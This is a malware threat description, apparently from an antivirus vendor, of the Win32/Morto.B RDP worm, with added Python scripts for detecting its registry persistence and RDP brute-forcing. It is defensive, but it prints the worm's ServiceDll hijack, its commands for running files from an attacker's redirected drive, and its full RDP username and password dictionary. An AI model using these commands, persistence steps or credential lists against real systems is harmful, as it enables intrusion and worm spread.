Win32/Morto [Threat Name]

Win32/Morto.B [Threat Variant Name]

Category worm
Size 49932 B
Detection created Aug 30, 2011
Detection database version 6422
Aliases Net-Worm.Win32.Morto.b (Kaspersky)
  W32/Morto.a.virus (McAfee)
  Worm:Win32/Morto.gen!A (Microsoft)
Short description

Win32/Morto.B is a worm that spreads over the network by guessing Remote Desktop (RDP) logon credentials from a built-in list of usernames and passwords; it does not rely on a software vulnerability. The worm also tries to download and execute several files from the Internet.

Installation

When executed, the worm creates the following files:

  • %windir%\clb.dll (6656 B, Win32/Morto.B)
  • %windir%\Offline Web Pages\cache.txt (6656 B, Win32/Morto.B)
  • %windir%\temp\ntshrui.dll (6656 B, Win32/Morto.B)

The worm may create copies of the following legitimate service DLLs (source, destination):

  • %system%\sens.dll, %system%\sens32.dll
  • %system%\ntmssvc.dll, %system%\ntmssvc32.dll
  • %system%\netman.dll, %system%\netman32.dll
  • %system%\rasauto.dll, %system%\rasauto32.dll

The following Registry entries are created:

  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\%existingservicename%\Parameters]
    • "ServiceDll" = "%windir%\temp\ntshrui.dll"
  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]
    • "NoPopUpsOnBoot" = 1
  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\%existingservicename%]
    • "(Default)" = "Service"
  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\%copiedservicename%]
    • "DependOnService" = ""
    • "Group" = "SchedulerGroup"
  • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\%copiedservicename%\Parameters]
    • "ServiceDll" = "%originaldll%32.dll"
  • [HKEY_LOCAL_MACHINE\System\Wpa]
    • "it" = "%variable1%"
    • "rmk" = "%variable2%"
    • "if" = "%variable3%"
    • "ct" = "%variable4%"
    • "lscan" = "%variable5%"
    • "rmd" = "%variable6%"
    • "cmd" = "%variable7%"
    • "md" = %malwarebody%
    • "ie" = "%malwarefilepath%"
    • "sn" = "%servicename1%"
    • "sr" = "%servicename2%"

A string with variable content is used instead of %variable1-7%.

The ServiceDll change hijacks an existing svchost-hosted service so that the worm's DLL is loaded at boot under that service's name; the SafeBoot\Minimal entry keeps the hijacked service loading in Safe Mode, and NoPopUpsOnBoot suppresses error dialogs that the replaced DLL would otherwise cause. The HKLM\System\Wpa key holds the worm's configuration and a copy of its own body.


After the installation is complete, the worm deletes the original executable file.
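
The registry state described above can be hunted for in a `reg export` dump of the affected machine. The following Python script is an added example, not part of the ESET description: it parses the text format that `reg export` writes (Windows Registry Editor Version 5.00) and flags a service whose ServiceDll points into a temp directory, a service whose ServiceDll is a "<name>32.dll" copy of one of the four cloned service DLLs, and the value names the worm writes under HKLM\System\Wpa. The sample export, the hit threshold for the Wpa key and the helper names are constructed for the example.

```python
"""Hunt for Win32/Morto.B persistence in a `reg export` text dump.

Added example (not ESET's code). Only the quoted REG_SZ form of ServiceDll is
decoded; REG_EXPAND_SZ values exported as hex(2): byte lists are kept raw and
would need decoding first. The sample export below is constructed.
"""
import re

# Service DLLs the worm clones to "<name>32.dll" (from the description above).
CLONED_SERVICE_DLLS = {"sens", "ntmssvc", "netman", "rasauto"}
# Configuration value names the worm writes under HKLM\System\Wpa.
WPA_VALUE_NAMES = {"it", "rmk", "if", "ct", "lscan", "rmd", "cmd", "md", "ie", "sn", "sr"}
SERVICES_PREFIX = "hkey_local_machine\\system\\currentcontrolset\\services\\"


def parse_reg_export(text):
    """Return {key_path_lower: {value_name_lower: raw_value}} from .reg text.

    Quoted string values are unescaped (\\\\ -> \\, \\" -> "); anything else,
    including dword: and hex: values, is kept as the raw right-hand side.
    """
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys[current] = {}
            continue
        m = re.match(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$', line)
        if m and current is not None:
            name = "(default)" if m.group(1) == "@" else m.group(1)[1:-1].lower()
            raw = m.group(2)
            if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
                raw = raw[1:-1].replace("\\\\", "\\").replace('\\"', '"')
            keys[current][name] = raw
    return keys


def find_morto_indicators(keys):
    """Return [(where, reason)] for registry state matching the installation section."""
    findings = []
    for key, values in keys.items():
        if key.startswith(SERVICES_PREFIX) and key.endswith("\\parameters"):
            service = key[len(SERVICES_PREFIX):-len("\\parameters")]
            dll = values.get("servicedll", "")
            # %windir%\temp\ntshrui.dll registered on an existing service
            if re.search(r"\\temp\\[^\\]+\.dll$", dll, re.IGNORECASE):
                findings.append((service, "ServiceDll loads from a temp directory: " + dll))
            # %originaldll%32.dll registered on the copied service
            m = re.fullmatch(r"([a-z]+)32\.dll", dll.rsplit("\\", 1)[-1].lower())
            if m and m.group(1) in CLONED_SERVICE_DLLS:
                findings.append((service, "ServiceDll is a '32' clone of %s.dll: %s" % (m.group(1), dll)))
        elif key == "hkey_local_machine\\system\\wpa":
            hits = WPA_VALUE_NAMES & set(values)
            if len(hits) >= 3:  # threshold is an assumption: the names are short, so require several
                findings.append(("HKLM\\System\\Wpa", "worm configuration values present: " + ", ".join(sorted(hits))))
    return findings


def scan_export(text):
    return find_morto_indicators(parse_reg_export(text))


# Constructed sample: one clean service, one hijacked service, one cloned service, one Wpa key.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netman\Parameters]
"ServiceDll"="C:\\Windows\\system32\\netman.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters]
"ServiceDll"="C:\\Windows\\temp\\ntshrui.dll"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtmsSvc2]
"DependOnService"=""
"Group"="SchedulerGroup"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NtmsSvc2\Parameters]
"ServiceDll"="C:\\Windows\\system32\\ntmssvc32.dll"

[HKEY_LOCAL_MACHINE\System\Wpa]
"it"="1"
"rmk"="x"
"lscan"="1"
"sn"="SENS"
"md"=hex:4d,5a,90,00,\
  03,00,00,00
"""

if __name__ == "__main__":
    for where, reason in scan_export(SAMPLE_EXPORT):
        print(where, "->", reason)
```

Run it against `reg export HKLM\SYSTEM\CurrentControlSet\Services services.reg` and `reg export HKLM\System\Wpa wpa.reg` from the suspect host; the temp-directory and "32 clone" checks are generic enough to catch the same ServiceDll hijack used by other svchost-persisting malware, so confirm a hit by hashing the DLL before acting on it.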

Spreading

Win32/Morto.B spreads over the network by brute-forcing Remote Desktop (RDP, TCP port 3389) logons with the usernames and passwords listed below.

The worm generates IP addresses and attempts RDP logons to each of them. If a logon succeeds, a copy of the worm is retrieved from the attacking machine over the RDP session: the attacker's drive is exposed to the victim through RDP drive redirection (the \\tsclient\a path), and the files below are run from it.


The following files are served from the attacking machine's redirected drive:

  • a.dll (6656 B, Win32/Morto.B)
  • r.reg (1198 B)

The worm executes the following commands on the newly compromised machine:

  • regedit /s \\tsclient\a\r.reg
  • rundll32 \\tsclient\a\a.dll

Because \\tsclient\a is the RDP client's redirected drive, both files are read directly from the attacking machine rather than copied to disk first.

The following usernames are used:

  • 1
  • a
  • actuser
  • adm
  • admin
  • admin1
  • admin2
  • administrator
  • aspnet
  • backup
  • console
  • david
  • guest
  • john
  • owner
  • root
  • server
  • sql
  • support
  • support_388945a0
  • sys
  • test
  • test1
  • test2
  • test3
  • user
  • user1
  • user2
  • user3
  • user4
  • user5

The following passwords are used (%u% stands for the username being tried):

  • !@#$
  • !@#$%
  • !@#$%^
  • !@#$%^&*
  • %u%
  • %u%1
  • %u%111111
  • %u%12
  • %u%123
  • %u%1234
  • %u%123456
  • 0
  • 000000
  • 1
  • 111
  • 1111
  • 111111
  • 1111111
  • 111222
  • 112233
  • 11223344
  • 12
  • 121212
  • 123
  • 123123
  • 123321
  • 12344321
  • 12345
  • 123456
  • 1234567
  • 12345678
  • 123456789
  • 1234567890
  • 1234qwer
  • 1313
  • 1314520
  • 159357
  • 168168
  • 1q2w3e
  • 1QAZ
  • 1qaz2wsx
  • 2010
  • 2011
  • 2012
  • 2222
  • 22222222
  • 3
  • 31415926
  • 369
  • 4321
  • 520
  • 520520
  • 654321
  • 666666
  • 7
  • 7777
  • 7777777
  • 77777777
  • 789456
  • 888888
  • 88888888
  • 987654
  • 987654321
  • 999999
  • a
  • aaa
  • abc
  • abc123
  • abcd
  • abcd1234
  • admin
  • admin123
  • computer
  • dragon
  • iloveyou
  • letmein
  • pass
  • password
  • PASSWORD
  • princess
  • qazwsx
  • rockyou
  • root
  • secret
  • server
  • super
  • test
  • user
  • Z1234
  • zxcvbnm
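
The credential lists above define both what Morto tries and what a Morto scan looks like from the target. The following Python script is an added example, not part of the ESET description: `account_exposed()` expands the %u% templates for a given account name (assumed here to mean the username being tried) and reports whether a password would fall to the worm's dictionary, and `detect_rdp_bruteforce()` walks constructed Windows Security event 4625 (logon failure) records and flags a source address that fails many RemoteInteractive logons across many distinct usernames within a short window, which is the footprint a Morto scan leaves on its target. The event records, thresholds and the abridged password list are constructed assumptions.

```python
"""Credential-exposure and RDP brute-force checks for Win32/Morto.B.

Added example (not ESET's code). The username set is the one listed above;
the password templates are abridged from the list above; %u% is assumed to
be the username under attack. Event records are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

MORTO_USERNAMES = {
    "1", "a", "actuser", "adm", "admin", "admin1", "admin2", "administrator",
    "aspnet", "backup", "console", "david", "guest", "john", "owner", "root",
    "server", "sql", "support", "support_388945a0", "sys", "test", "test1",
    "test2", "test3", "user", "user1", "user2", "user3", "user4", "user5",
}

# Abridged from the list above; %u% is expanded per account.
MORTO_PASSWORD_TEMPLATES = [
    "!@#$", "%u%", "%u%1", "%u%12", "%u%123", "%u%1234", "%u%123456",
    "0", "1", "111111", "123", "123456", "12345678", "1q2w3e", "1qaz2wsx",
    "2011", "abc123", "admin", "admin123", "letmein", "password", "PASSWORD",
    "server", "test", "user",
]


def expand_morto_passwords(username):
    """The concrete passwords the worm would try against one account."""
    return [t.replace("%u%", username) for t in MORTO_PASSWORD_TEMPLATES]


def account_exposed(username, password):
    """True if the worm's dictionary would log this account in over RDP.

    Windows usernames are case-insensitive; passwords are not.
    """
    return username.lower() in MORTO_USERNAMES and password in expand_morto_passwords(username)


def detect_rdp_bruteforce(events, window=timedelta(minutes=5), min_failures=20, min_users=5):
    """Sliding-window detector over Security 4625 records.

    Each event is a dict with EventID, LogonType, TargetUserName, IpAddress and
    TimeCreated (ISO 8601). Returns {ip: {"failures", "users", "morto_overlap"}}
    for sources with >= min_failures failed RDP logons spread over >= min_users
    distinct accounts inside `window`. LogonType 10 is RemoteInteractive; with
    Network Level Authentication failed RDP logons are often recorded as
    LogonType 3 instead, so widen the filter to {3, 10} on NLA-enabled hosts.
    """
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625 and e["LogonType"] == 10:
            by_ip[e["IpAddress"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"].lower()))
    alerts = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            span = attempts[start:end + 1]
            users = {u for _, u in span}
            if len(span) >= min_failures and len(users) >= min_users:
                alerts[ip] = {"failures": len(attempts), "users": len({u for _, u in attempts}),
                              "morto_overlap": len({u for _, u in attempts} & MORTO_USERNAMES)}
                break
    return alerts


def constructed_events():
    """Constructed sample: one scanner cycling the worm's usernames, one admin mistyping."""
    base = datetime(2011, 8, 28, 3, 14, 0)
    events = []
    for i, user in enumerate(sorted(MORTO_USERNAMES)[:25]):
        events.append({"EventID": 4625, "LogonType": 10, "TargetUserName": user,
                       "IpAddress": "198.51.100.23",
                       "TimeCreated": (base + timedelta(seconds=4 * i)).isoformat()})
    for i in range(3):  # a real user failing three times should not alert
        events.append({"EventID": 4625, "LogonType": 10, "TargetUserName": "jsmith",
                       "IpAddress": "10.0.0.5",
                       "TimeCreated": (base + timedelta(seconds=30 * i)).isoformat()})
    return events


if __name__ == "__main__":
    print(account_exposed("admin", "admin123"), account_exposed("test", "test1"))
    print(detect_rdp_bruteforce(constructed_events()))
```

The distinct-username condition is what separates a Morto-style scan from a single user locked out of their own account, and the overlap count against the worm's list is a cheap attribution hint, not proof; the same detector flags any RDP password spray. Feed it `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625}` output after mapping the event XML fields to the dict keys used here.
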

Information stealing

The worm collects the following information:

  • CPU information
  • memory status
  • antivirus software detected on the affected machine

The worm attempts to send gathered information to a remote machine.

Other information

The worm acquires data and commands from a remote computer or the Internet.

The worm contains a list of 9 URLs.


It can execute the following operations:

  • perform DoS/DDoS attacks
  • send gathered information

The worm tries to download several files from the Internet.


These are stored in the following locations:

  • %temp%\­~MTMP%variable%.exe

The files are then executed.


The %variable% represents a random number.

